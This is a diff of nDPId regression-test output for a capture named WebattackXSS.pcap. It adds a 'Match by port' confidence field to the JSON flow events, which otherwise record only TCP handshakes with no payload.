 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347699724,"flow_last_seen":1499347704808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347824163,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347702287,"flow_last_seen":1499347707810,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347824163,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60014,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347702287,"flow_last_seen":1499347707810,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347824163,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60014,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347702287,"flow_last_seen":1499347707810,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347824163,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60014,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347703726,"flow_last_seen":1499347708810,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347824163,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60028,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347703726,"flow_last_seen":1499347708810,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347824163,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60028,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347703726,"flow_last_seen":1499347708810,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347824163,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60028,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347824426,"flow_last_seen":1499347824426,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347824426,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33082,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":1,"flow_last_seen":1499347824426,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347824426,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80mVAAD4G82qsEAABwKgKMoE6AFCPwv7yAAAAAKACchAg8QAAAgQFtAQCCAoBPCyXAAAAAAEDAwc="}
@@ -2910,17 +2910,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7209,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":1,"flow_last_seen":1499347833462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347833462,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8H+JAAD4Gpe6sEAABwKgKMoGYAFAzOSqIAAAAAKACchBItAAAAgQFtAQCCAoBPDVqAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7210,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":2,"flow_last_seen":1499347833462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347833462,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgZimBogRMzkqiaAScSAQtwAAAgQFtAQCCAoD5gbeATw1agEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":3,"flow_last_seen":1499347833462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347833462,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0H+NAAD4GpfWsEAABwKgKMoGYAFAzOSqJpgaIEoAQAOWvvgAAAQEICgE8NWoD5gbe"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347705116,"flow_last_seen":1499347710811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347834535,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60042,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347705116,"flow_last_seen":1499347710811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347834535,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60042,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347705116,"flow_last_seen":1499347710811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347834535,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347706399,"flow_last_seen":1499347711812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347834535,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60056,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347706399,"flow_last_seen":1499347711812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347834535,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60056,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347706399,"flow_last_seen":1499347711812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347834535,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60056,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347709252,"flow_last_seen":1499347714812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347834535,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60084,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347709252,"flow_last_seen":1499347714812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347834535,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60084,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347709252,"flow_last_seen":1499347714812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347834535,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60084,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347712277,"flow_last_seen":1499347717814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347834535,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60134,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347712277,"flow_last_seen":1499347717814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347834535,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60134,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347712277,"flow_last_seen":1499347717814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347834535,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347712277,"flow_last_seen":1499347717814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347834535,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60136,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347712277,"flow_last_seen":1499347717814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347834535,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347712277,"flow_last_seen":1499347717814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347834535,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347713588,"flow_last_seen":1499347718814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347834535,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60154,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347713588,"flow_last_seen":1499347718814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347834535,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60154,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347713588,"flow_last_seen":1499347718814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347834535,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7230,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347836095,"flow_last_seen":1499347836095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347836095,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7230,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":1,"flow_last_seen":1499347836095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347836095,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Z2FAAD4GXm+sEAABwKgKMoGyAFBvhFCdAAAAAKACchDjpwAAAgQFtAQCCAoBPDf8AAAAAAEDAwc="}
@@ -2942,15 +2942,15 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7281,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":1,"flow_last_seen":1499347842491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347842491,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lUdAAD4GMImsEAABwKgKMoH2AFCtqqt8AAAAAKACchBEHwAAAgQFtAQCCAoBPD47AAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7282,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":2,"flow_last_seen":1499347842491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347842491,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgfYhjECLraqrfaAScSDPUAAAAgQFtAQCCAoD5g+wATw+OwEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7284,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":3,"flow_last_seen":1499347842492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347842492,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lUhAAD4GMJCsEAABwKgKMoH2AFCtqqt9IYxAjIAQAOVuVwAAAQEICgE8PjwD5g+w"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347716243,"flow_last_seen":1499347721814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347844819,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60180,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347716243,"flow_last_seen":1499347721814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347844819,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60180,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347716243,"flow_last_seen":1499347721814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347844819,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347717533,"flow_last_seen":1499347722814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347844819,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60194,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347717533,"flow_last_seen":1499347722814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347844819,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60194,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347717533,"flow_last_seen":1499347722814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347844819,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60194,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347720094,"flow_last_seen":1499347725815,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347844819,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60220,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347720094,"flow_last_seen":1499347725815,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347844819,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60220,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347720094,"flow_last_seen":1499347725815,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347844819,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347721376,"flow_last_seen":1499347726816,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347844819,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60234,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
